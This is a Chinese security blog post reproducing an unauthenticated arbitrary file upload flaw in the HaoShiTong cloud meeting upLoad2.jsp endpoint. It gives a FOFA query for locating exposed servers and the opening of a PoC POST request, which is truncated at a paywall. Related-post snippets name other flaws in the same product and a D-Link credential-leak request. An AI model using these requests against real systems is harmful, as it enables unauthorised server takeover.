好视通云会议 upLoad2.jsp 任意文件上传漏洞复现

最新推荐文章于 2024-09-02 16:20:07 发布
最新推荐文章于 2024-09-02 16:20:07 发布
阅读量1.3k 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134696605
版权
本文介绍了好视通云会议的upLoad2.jsp文件上传漏洞,包括产品简介、漏洞概述、复现环境及修复建议。漏洞允许未认证攻击者上传恶意文件,威胁服务器安全。官方已提供修复措施。
摘要由CSDN通过智能技术生成

0x01 产品简介

   好视通云会议是基于 Internet 的网络视频会议产品,用户使用好视通云会议可以实现多人音视频交流、文字聊天、共享文档、共享屏幕等,会议的管理者可以控制其他参会人的各种权限,可以将会议录制成视频,对会场进行点名等。

0x02 漏洞概述

 好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,最终可获取服务器权限。

0x03 复现环境

FOFA:app="好视通-云会议"

0x04 漏洞复现 

PoC

POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Ver
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
好视通视频会议存在漏洞2021
战神/calmness的博客
11-18 3922
简介 好视通视频会议软件后台登陆处存在admin弱口令,后台可以构造url触发任意文件下载漏洞,还有xss漏洞 过程 app="好视通-视频会议“ /register/toDownload.do?fileName= 文件下载 建议 修改密码、升级软件版本 ...
漏洞复现好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC
失心少年
11-24 847
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!“好视通”是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 [5] ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。漏洞链接:https://127.0.0.1/register/toDownload.do?
好视通视频会议系统存在任意文件读取漏洞复现 [附POC]
Liyu_6618的博客
03-02 748
好视通视频会议系统存在任意文件读取漏洞复现 [附POC]
好视通视频会议平台系统漏洞复现
千寻的博客
05-21 2066
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞点fofa漏洞复现一第一步 查看登录界面第二步 使用弱口令第三步 进入系统第四步 任意文件读取摘抄 漏洞名称 弱口令 任意文件下载 漏洞编号 CNVD-2020-62437 https://www.cnvd.org.cn/flaw/show/CNVD-2020-62437 漏洞描述 好视通会议是一款高效、便捷、低成本的网络视频会议产品,通过电脑或手机登录好视通云平台, 便可快速地与全球各地团队进行实时音视频沟通,并可同步分享各类数据文档。 好视通视频会
DVWA ——File Upload 任意文件上传
weixin_51559599的博客
11-16 253
low 级别的文件上传没有任何过滤。
好视通视频会议系统toDownload.do任意文件读取
weixin_43567873的博客
03-06 80
好视通视频会议系统toDownload.do接口处存在任意文件读取
tutemastev#PeiQi-WIKI-POC#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通
好视通视频会议平台存在默认口令&&任意文件下载
Fengxin的博客
11-03 1514
0x00 产品介绍 深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商,隶属于齐心集团(股票代码:002301)。 公司旗下“好视通”是国内云视频会议知名品牌,连续三年在云视频会议市场占有率第一(数据来源IDC调研报告),其应用范围主要包含:远程会议,远程教育,远程培训,远程医疗,远程招聘,应急指挥等。 0x01漏洞简介 好视通视频会议平台系统存在弱口令和任意文件下载漏洞。 0x02 Fofa语法 “深圳银澎云计算有限公司” 搜索结果如下: 0x03 漏洞复现 1、目标站点如下所示: 2、默
JAVAWEB开发之文件的上传与下载(开源组件commons-fileupload的详细使用)
iteye_18817的博客
02-28 592
文件上传简介 什么是文件上传?为什么使用文件上传文件上传就是将客户端资源,通过网路传递到服务器端。 因为文件数据比较大,必须通过文件上传才可以完成将数据保存到数据库端的操作。 文件上传的本质就是IO流操作。 演示:文件上传应该如何操作? 浏览器端:1.method=post 只有post才可以携带大数据2.必须使用<input type='file' name='f'>...
PeiQi0#PeiQi-WIKI-Book#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感
jsp文件上传漏洞详解
zkaqlaoniao的博客
11-06 1213
在某次对某单位进行渗透测试时,遇到一个上传点,网站是java写的,但是上传jspjspx时会被waf拦截,但由于上传路径可控,经过不懈努力最终成果拿到shell,于是写这篇文章记录一下。目录中可以用来放置JSP的静态资源,在servlet3.0协议规范中,包含在jar文件 /META-INFO/resources/ 路径下的资源是可以直接访问的。,代表tomcat默认开启热部署,一旦web应用的web.xml文件的时间戳发生变化(创建时间,修改时间或访问时间发生变化),tomcat就会重新加载应用。
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1408
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
2021年漏洞整合2+检测工具
weixin_48421613的博客
12-19 1038
2021年快结束了,又迎来了冬奥会攻防演练,此次编写的目的依然只是提供大家自学和参考,重要的是对自己公司资产的一个梳理,脚本仅支持检测,没有利用getshell功能,请大家合理合法使用,不要胡乱日站,出事不负责哦 ​ 此次脚本支持检测的内容如下: ‘1 CVE-2021-43798 grafana任意文件读取漏洞检测’ ‘2 CVE-2021-36749 Apache Druid任意文件读取漏洞检测​’ ‘3 CVE-2021-37580 Apache ShenYu身份验证绕过漏洞检测’ ‘4 CVE-20
AI安全立法:加州新法案的争议与未来影响
2301_79342058的博客
09-01 919
正如之前详细探讨过的那样,SB-1047法案要求AI模型的创建者在模型出现“对公共安全和安保构成新威胁”时,尤其是在“缺乏人类监督、干预或管理”的情况下,必须实施一种可以“关闭”该模型的“杀手开关”。不要错过这个机会,成为AI领域的领跑者。在周三宣布立法通过时,该法案的发起人、州参议员斯科特·维纳(Scott Weiner)引用了AI行业知名人士的支持,如Geoffrey Hinton和Yoshua Bengio(这两位去年也签署了一份声明,警告快速发展的AI技术可能带来的“灭绝风险”)。
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 1319
然后看它们之间的各种各样的依赖关系
IT服务器安全规范 2024.08
S0linteeH's Blog
08-30 1869
安全配置建议 使用场景 场景说明 安全配置建议 登录密钥 服务器登录账号及密钥。 建议设置为强密码形式:12位以上,同时包含数字、大小写字母、特殊符号 远程登录端口 22、3389端口分别用于服务器的Linux和Windows场景下的远程登录,需对这两端口进行安全限制。 利用安全组限制22、3389远程登录端口的访问来源IP。无法设置白名单时,将远程登录的方式设置为SSH Key认证方式。 MySQL、FTP等在安装的高危服务端口 由于MySQL和
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
最新发布
09-02 1100
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
web渗透:SSRF漏洞
weixin_68416970的博客
09-02 1036
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,它允许攻击者构造请求,由服务端发起,从而访问服务端无法直接访问的内部或外部资源。为了防范SSRF漏洞,应用程序应该实施严格的输入验证,限制外部请求的来源和类型,以及避免在服务器端执行用户可控的外部请求。内外网web应用攻击:利用SSRF漏洞,攻击者可以针对内外网的web应用发起攻击,特别是那些通过GET参数即可触发的漏洞。通过实施这些措施,可以显著降低SSRF漏洞被利用的风险,保护应用程序和数据的安全
华视瑞通好视通软件视频会议方案详解与服务
本软件视频会议方案详细介绍了由上海视盈数码科技有限公司提供的好视通视频会议系统解决方案。该方案主要分为五个部分:公司及核心优势介绍、需求分析、系统设计、产品与功能介绍以及工程与客户服务。 1. 公司及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值